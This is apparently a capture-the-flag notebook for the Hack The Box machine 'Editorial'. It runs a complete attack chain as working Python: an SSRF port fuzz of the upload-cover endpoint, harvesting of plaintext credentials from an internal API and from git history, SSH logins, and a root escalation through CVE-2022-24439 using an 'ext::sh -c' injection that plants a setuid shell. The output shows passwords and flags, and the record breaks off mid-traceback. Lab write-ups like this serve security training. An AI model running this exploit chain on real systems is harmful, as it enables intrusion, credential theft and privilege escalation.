# Editorial

> Reference:
>
> - <https://0xdf.gitlab.io/2024/10/19/htb-editorial.html>
> - <https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858>

<https://www.hackthebox.com/machines/editorial>


## Port Scanning

> Remember to add a reference in `/etc/hosts` for `editorial.htb`

```bash
sudo nmap -vv -sC -sV -T4 -A editorial.htb
```

In [None]:
# Check if `/opt/homebrew/bin/nmap` exists on macOS
from pathlib import Path

nmap_path = Path("/opt/homebrew/bin/nmap")
if nmap_path.exists():
    print("Nmap is installed.")
else:
    # Throw an error to interrupt
    raise FileNotFoundError("Nmap is not installed.")

Nmap is installed.


In [None]:
import getpass
import shlex
import subprocess

password: str = getpass.getpass("Enter your password: ")
command = f"sudo -S {nmap_path} -oX - -vv -sC -sV -T4 -A editorial.htb"
process = subprocess.Popen(
    shlex.split(command),
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True,
)

outs, errs = process.communicate(input=password + "\n")

In [None]:
import xml.etree.ElementTree as ET

tree = ET.ElementTree(ET.fromstring(outs))
root = tree.getroot()
if root is None:
    raise ValueError("Failed to parse XML.")

# Print ports
print("Ports:")
for port in root.iterfind(".//ports/port"):
    print(port.attrib)
    # Print services
    for service in port.iterfind("service"):
        print(service.attrib)

# Print os
print("\nOS Matches:")
for os in root.iterfind(".//os/osmatch"):
    print(os.attrib)

Ports:
{'protocol': 'tcp', 'portid': '22'}
{'name': 'ssh', 'product': 'OpenSSH', 'version': '8.9p1 Ubuntu 3ubuntu0.7', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}
{'protocol': 'tcp', 'portid': '80'}
{'name': 'http', 'product': 'nginx', 'version': '1.18.0', 'extrainfo': 'Ubuntu', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}

OS Matches:
{'name': 'Linux 4.15 - 5.19', 'accuracy': '100', 'line': '70533'}


## Exploit `/upload-cover` API

- Endpoint: `http://editorial.htb/upload-cover`

In [None]:
import asyncio
from typing import Optional

import aiohttp
from tqdm.notebook import tqdm

BASE_URL = "http://editorial.htb"
API_URL = f"{BASE_URL}/upload-cover"
FAILURE_IMAGE_PATH = (
    "/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg"
)
MAX_CONCURRENT_REQUESTS = 40
LOCALHOST_URL_FMT = "http://127.0.0.1:{:d}"


async def ssrf_request(
    session: aiohttp.ClientSession, url: str
) -> Optional[str]:
    data = aiohttp.FormData()
    data.add_field("bookurl", url)
    data.add_field(
        "bookfile",
        value="",
        content_type="application/octet-stream",
        filename="",
    )

    try:
        response = await session.post(
            API_URL,
            data=data,
            raise_for_status=True,
            timeout=aiohttp.ClientTimeout(total=10),
        )
    except aiohttp.ServerConnectionError as err:
        return None
    except aiohttp.ClientError as err:
        print(f"Error: {err=}, {port=}")
        return None
    except asyncio.TimeoutError:
        print(f"Request timed out: {port=}")
        return None

    return await response.text()


async def check_port(
    session: aiohttp.ClientSession,
    port: int,
    sem: asyncio.Semaphore,
) -> Optional[tuple[int, str]]:
    bookurl = LOCALHOST_URL_FMT.format(port)
    async with sem:
        image_path = await ssrf_request(session, bookurl)
        if image_path is None:
            return None
        image_path = image_path.strip()
        return (port, image_path) if image_path != FAILURE_IMAGE_PATH else None


async def fuzz_ports() -> list[int]:
    ports = []
    sem = asyncio.Semaphore(MAX_CONCURRENT_REQUESTS)
    async with aiohttp.ClientSession() as session:
        # NOTE: should iterate over all ports. Since we know `5000` is the answer,
        # we can reduce the range
        tasks = [check_port(session, port, sem) for port in range(4500, 5001)]

        try:
            for coro in tqdm(asyncio.as_completed(tasks), total=len(tasks)):
                result = await coro
                if result is None:
                    continue
                port, _ = result
                print(f"Found open port: {port}")
                ports.append(port)
        except asyncio.CancelledError:
            print("Cancelled")
        except KeyboardInterrupt:
            print("Interrupted by user")

    print(f"Open ports: {ports}")

    return ports


ports = await fuzz_ports()

  0%|          | 0/501 [00:00<?, ?it/s]

Found open port: 5000
Open ports: [5000]


## Explore Locally Exposed Ports

In [None]:
import json
import pprint
from typing import Optional

import aiohttp


async def fetch_image(
    session: aiohttp.ClientSession, image_path: str
) -> Optional[str]:
    if not image_path.startswith("/"):
        image_path = "/" + image_path
    try:
        image_url = f"{BASE_URL}{image_path}"
        async with session.get(image_url, raise_for_status=True) as response:
            return await response.text()
    except Exception as e:
        print(f"Error fetching image: {e}")
        return None


async def fetch_content(
    session: aiohttp.ClientSession, port: int, endpoint: str = ""
) -> Optional[str]:
    bookurl = LOCALHOST_URL_FMT.format(port) + endpoint
    image_path = await ssrf_request(session, bookurl)
    if image_path is None:
        return None
    if not image_path.startswith("/"):
        image_path = "/" + image_path
    print(f"GET {bookurl}: {image_path}")

    return await fetch_image(session, image_path)


assert len(ports) == 1
port = ports[0]

async with aiohttp.ClientSession() as session:
    content = await fetch_content(session, port)
    api_docs: dict = json.loads(content) if content else {}

pprint.pprint(api_docs)

GET http://127.0.0.1:5000: /static/uploads/99af8ecc-3a62-4690-81b3-d34fb29caf3e
{'messages': [{'promotions': {'description': 'Retrieve a list of all the '
                                             'promotions in our library.',
                              'endpoint': '/api/latest/metadata/messages/promos',
                              'methods': 'GET'}},
              {'coupons': {'description': 'Retrieve the list of coupons to use '
                                          'in our library.',
                           'endpoint': '/api/latest/metadata/messages/coupons',
                           'methods': 'GET'}},
              {'new_authors': {'description': 'Retrieve the welcome message '
                                              'sended to our new authors.',
                               'endpoint': '/api/latest/metadata/messages/authors',
                               'methods': 'GET'}},
              {'platform_use': {'description': 'Retrieve examples of how to '
  

In [None]:
import pprint
import re

CONTENT_NOT_FOUND = "404 Not Found"
USERNAME_PASSWORD_PATTERN = re.compile(
    r"Username: (?P<username>\w+)\\nPassword: (?P<password>[\w!@]+)\\n"
)

endpoints = []
for category, entries in api_docs.items():
    for entry in entries:
        for api_name, api_doc in entry.items():
            endpoints.append(api_doc["endpoint"])
pprint.pprint(endpoints)

# Extract username and password
username = None
password = None
async with aiohttp.ClientSession() as session:
    for endpoint in endpoints:
        content = await fetch_content(session, port, endpoint=endpoint)
        if content is not None and CONTENT_NOT_FOUND not in content:
            if match := USERNAME_PASSWORD_PATTERN.search(content):
                payload = json.loads(content) if content else {}
                print(f"Content from {endpoint}:")
                # pprint.pprint(payload)
                print(payload)
                username = match.group("username")
                password = match.group("password")
                print(f"Username: {username}")
                print(f"Password: {password}")
if username is None or password is None:
    raise ValueError("Failed to extract username and password.")
credentials = {username: password}

['/api/latest/metadata/messages/promos',
 '/api/latest/metadata/messages/coupons',
 '/api/latest/metadata/messages/authors',
 '/api/latest/metadata/messages/how_to_use_platform',
 '/api/latest/metadata/changelog',
 '/api/latest/metadata']
GET http://127.0.0.1:5000/api/latest/metadata/messages/promos: /static/uploads/f57260bb-7ece-4a88-9009-68588d8c5dce
GET http://127.0.0.1:5000/api/latest/metadata/messages/coupons: /static/uploads/53855768-8aa1-4748-8954-d5050acf43c6
GET http://127.0.0.1:5000/api/latest/metadata/messages/authors: /static/uploads/88389a97-1678-47be-b207-8ab4eac2c3fb
Content from /api/latest/metadata/messages/authors:
{'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\n

## Shell as `dev`

In [None]:
import asyncssh

if "dev" not in credentials:
    raise ValueError("No credentials for user 'dev' found.")

username = "dev"
password = credentials[username]

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Obtain the flag
    result = await conn.run("cat user.txt", check=True)
    if result.stdout is not None:
        dev_flag = result.stdout.strip()
        print(f"Dev flag: {dev_flag}")

    # Check commit history within `/home/dev/apps` directory
    result = await conn.run(
        'cd /home/dev/apps && git --no-pager log -p -G "Username: .*Password: .*"',
        check=True,
    )
    if result.stdout is None:
        raise ValueError("Failed to retrieve commit history.")
    commit_history = result.stdout.strip()
    if isinstance(commit_history, bytes):
        commit_history = commit_history.decode("utf-8")
    assert isinstance(commit_history, str)

    for match in USERNAME_PASSWORD_PATTERN.finditer(commit_history):
        username = match.group("username")
        password = match.group("password")

        if username in credentials:
            if credentials[username] == password:
                continue  # Skip already known credentials
            else:
                print(
                    f"Found different credentials for {username}: {password}"
                )
        else:
            credentials[username] = password
            print(
                f"Username: {match.group('username')}, Password: {match.group('password')}"
            )

uid=1001(dev) gid=1001(dev) groups=1001(dev)
Dev flag: d738b03111835de9d3343e8963d18ea9
Username: prod, Password: 080217_Producti0n_2023!@


## Shell as `prod`

In [None]:
if "prod" not in credentials:
    raise ValueError("No credentials for user 'prod' found.")

username = "prod"
password = credentials[username]

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Check privilege
    result = await conn.run(f"echo {password} | sudo -S -l", check=True)
    print(result.stdout, end="")

uid=1000(prod) gid=1000(prod) groups=1000(prod)
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *


## Shell as `root`

Exploit `CVE-2022-24439` to get `root` access

In [None]:
if "prod" not in credentials:
    raise ValueError("No credentials for user 'prod' found.")

username = "prod"
password = credentials[username]

ROOT_SHELL_PATH = "/home/prod/root_sh"
EXPLOIT_SCRIPT = f"""
#!/bin/bash

cp /bin/sh {ROOT_SHELL_PATH}
chown root:root {ROOT_SHELL_PATH}
chmod 6777 {ROOT_SHELL_PATH}
""".strip()
EXPLOIT_SCRIPT_PATH = "/home/prod/exploit.sh"

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Create the exploit script
    result = await conn.run(
        f"echo '{EXPLOIT_SCRIPT}' > {EXPLOIT_SCRIPT_PATH}", check=True
    )
    print(result.stdout, end="")

    # Make the exploit script executable
    result = await conn.run(f"chmod +x {EXPLOIT_SCRIPT_PATH}", check=True)
    print(result.stdout, end="")

    # Execute the exploit
    result = await conn.run(
        f"echo {password} | sudo -S /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c {EXPLOIT_SCRIPT_PATH}'"
    )
    print(result.stdout, end="")
    print(result.stderr, end="")

    # Obtain the shell
    result = await conn.run(
        f"{ROOT_SHELL_PATH} -p -c 'id' && {ROOT_SHELL_PATH} -p -c 'cat /root/root.txt'",
        check=True,
    )
    print(result.stdout, end="")

uid=1000(prod) gid=1000(prod) groups=1000(prod)
[sudo] password for prod: Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext